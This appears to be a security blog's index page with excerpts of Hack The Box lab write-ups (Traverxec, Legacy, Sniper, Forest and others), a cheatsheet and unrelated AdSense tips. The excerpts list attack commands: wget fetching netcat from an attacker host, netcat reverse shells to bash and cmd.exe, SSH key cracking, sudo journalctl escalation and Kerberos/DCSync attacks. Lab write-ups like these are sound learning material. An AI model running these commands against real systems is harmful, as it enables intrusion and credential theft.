admin

Hack the box(HTB) Traverxec write up 0 (0)

by
Hack the box(HTB) Traverxec write up
Tweet
Share
Share
Pin
0 Shares

Commands used 1-nmap -sC -sV -O -v -oA initial 10.10.10.42-python getshell.py 10.10.10.165 80 “cd / && mkdir tmp”3-python getshell.py 10.10.10.165 80 “cd /tmp && wget http://10.10.14.20:8000/nc”4-python getshell.py 10.10.10.165 80 “/tmp/nc -e /bin/bash 10.10.14.20 4444″5-cd /home/david/public_www6-base64 backup-ssh-identity-files.tgz7-base64 -d file >>new file8-/usr/share/john/ssh2john.py id_rsa9-john hash –wordlist=/root/Desktop/rockyou.txt10-ssh -i id_rsa [email protected]/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service12-!/bin/bash Steps invloved 1-Enumeration2-Exploiting nostromo 1.9.63-Getting a … Read more

Hack the box(HTB) Legacy writeup 0 (0)

by
Hack the box(HTB) legacy writeup
Tweet
Share
Share
Pin
0 Shares

Its an easy box from hack the box which is very easy and it is more of CVE type. Commands used nmap -sC -sV -O -v -oA initial 10.10.10.4 msfconsole use exploit/windows/smb/ms08_067_netapi show options Steps involved EnumerationFinding exploitUsing metasploit module to exploit it. Enumeration Nmap Scan Increasing send delay for 10.10.10.4 from 0 to 5 … Read more

Hack the box(HTB) Registry writeup 0 (0)

by
Hack the box registry writeup
Tweet
Share
Share
Pin
0 Shares

Introduction Registry is a retired machine from the platform hack the box and writeups of retired machines are only allowed. Registry is a HARD machine of worth points 40. Steps Nmap scan Enumerating webpages Exploiting docker Getting docker blobs Getting id_rsa keys Getting user.txt Enumerating Login into bolt webpage and uploading reverse shell Backing up … Read more

Hack the box(HTB) Sniper write up 0 (0)

by
Hack the box(HTB) Sniper write up
Tweet
Share
Share
Pin
0 Shares

Steps Nmap scan Finding RFI Setting up Samba server Getting reverse shell Privilege escalation(Getting user.txt) Basic enumeration Making malicious .chm file Getting the reverse shell(Getting root.txt) Commands used nmap -sC -sV -oV 10.10.10.151 nano /etc/samba/smb.conf service smbd start nc.exe 10.10.14.39 4444 -e cmd.exe powershell $username = ‘SNIPER\Chris’ $password = ’36mEAhz/B8xQ~2VM’ $securePassword = ConvertTo-SecureString $password -AsPlainText … Read more

Hackthebox(HTB) Forest Detailed Writeup | walkthrough 0 (0)

by
Forest hack the box writeup
Tweet
Share
Share
Pin
0 Shares

Steps: Nmap Scan. Enumerating user names. Exploiting Kerberos Decryption of hash.txt. Login with Evil-winrm(user) Uploading Blood hound Adding User to group. Escalating the privilages. DCSync attack via secretsdump Login with wmiexec.py(root) Tools used Impacket(GetNPUsers.py,ntlmrelayx.py ,secretsdump.py) Evil-winrm Bloodhound. Commands used nmap -sC -sV -oV 10.10.10.161 enum4linux -a 10.10.10.161 GetNPUsers.py HTB.local/ -usersfile /root/Desktop/htb/forest/user.txt -format john -outputfile hashes.txt … Read more

Cheatsheet for HTB 5 (2)

by
Tweet
Share
Share
Pin
0 Shares

Linux General ctrl + r Search History reverse Run Script at startup update-rc.d -f /path/to/the/script remove Delete Script from defaults Vim i for insert mode esc to leave insert mode To be continued with macros and all this handy shit Tmux Config from ippsec. First press the prefix ctrl + a, then release the buttons … Read more

Getting Started with CTFs 0 (0)

by
CTF starting
Tweet
Share
Share
Pin
0 Shares

CTF Competitions DEFCON CTF picoCTF Ghost in the Shellcode ROOTCON Campus Tour CTF ROOTCON CTF CSAW CTF HSCTF UCSB iCTF Smash the Stack Embedded Security CTF DefCamp CTF HITCON CTF CTF Guides and Resources Trail of Bits CTF Guide – one of the best guides for newbies Practice CTF List / Permanent CTF List – … Read more

How to Get Google Adsense Approval Within a few Days in 2020 5 (2)

by
google adsence approval in 2020
Tweet
Share
Share
Pin
0 Shares

Buy and use a custom domain name, e.g. your-domain.com !!!! Create a domain specific email address, example [email protected] !!!! Add legal pages like About, Contact, Privacy !!!! Ensure you use a clean easy design. !!!! Do not use other ads !!! Have at least 10-15 well-written blog posts with unique content !!!! Ensure you don’t … Read more

wpChatIcon